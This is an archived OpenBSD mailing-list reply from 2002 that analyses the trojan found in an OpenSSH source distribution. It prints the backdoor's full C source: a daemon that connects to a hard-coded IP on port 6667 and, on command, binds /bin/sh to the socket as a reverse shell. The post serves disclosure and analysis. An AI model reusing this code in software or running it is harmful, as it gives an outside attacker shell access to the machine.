[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: openssh trojaned..

To: "misc@openbsd.org" <misc@openbsd.org>
Subject: Re: openssh trojaned..
From: Panagiotis Kotsiopoulos <pkotsiop@dsg.internet.gr>
Date: Fri, 2 Aug 2002 07:10:48 +0300 (EEST)

On Thu, 1 Aug 2002, Jan Wildeboer wrote:

> Lars Hansson wrote:
>
> > They will probably inform us when they have figured out if it's true and
>  > if so, how it happened.

I've checked the code on bf-test output and i think it compiles itself and
then tries to connect to 203.62.158.32:6667, then reads from the server a
single character and if the character is "D" it binds a shell back. I
think it is a reverse shell backdoor.

NOTE: The letters checked on switch() are "A" ,"D", "M" (???).

Below is the code executed (formated by indent):

---------- code start ---------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
void
sig (int sig)
{
  close (s);
  sleep (3600);
  longjmp (env, 0);
}

int
main ()
{
  int x;
  char c, *a[2];
  struct sockaddr_in sa;
  struct sigaction act;
  switch (fork ())
    {
    case 0:
      break;
    default:
      exit (0);
    }
  close (0);
  close (1);
  close (2);
  memset (&act, 0, sizeof (act));
  act.sa_handler = sig;
  sigaction (SIGALRM, &act, NULL);
  do
    {
      setjmp (env);
      if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
        exit (1);
      memset (&sa, 0, sizeof (sa));
      sa.sin_family = AF_INET;
      sa.sin_port = htons (6667);
      sa.sin_addr.s_addr = inet_addr ("203.62.158.32");
      alarm (10);
      if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == (-1))
        exit (1);
      if ((x = read (s, &c, 1)) == (-1))
        {
          exit (1);
        }
      else if (x == 1)
        {
          switch (c)
            {
            case 'A':
              exit (0);
            case 'D':
              alarm (0);
              dup2 (s, 0);
              dup2 (s, 1);
              dup2 (s, 2);
              a[0] = i_val;
              a[1] = NULL;
              execve (a[0], a, NULL);
              break;
            case 'M':
              alarm (0);
              sig (0);
              break;
            default:
            }
        }
      else
        {
          exit (0);
        }
    }
  while (1);
}

_ACEOF
---------- code end --------------------

>
> Well - the word of  atrojan in OpenSSH is spreading. It has also been
> mentioned on the Heise Newsticker, a known german site:
>
> http://www.heise.de/newsticker/data/pab-01.08.02-000/
>
> I would expect an immediate response of the OpenSSH people. This is
> hurting the reputation of OpenSSH and OpenBSD too.
>
> Jan Wildeboer
>
>

------------------------------------------------------------

Don't be a zombie process on the most buggy OS ( The World )

References:
- Re: openssh trojaned..
  - From: Jan Wildeboer <jan.wildeboer@gmx.de>

Prev by Date: Re: openssh trojaned..
Next by Date: Re: openssh trojaned..
Prev by thread: Re: openssh trojaned..
Next by thread: Re: openssh trojaned..
Index(es):
- Date
- Thread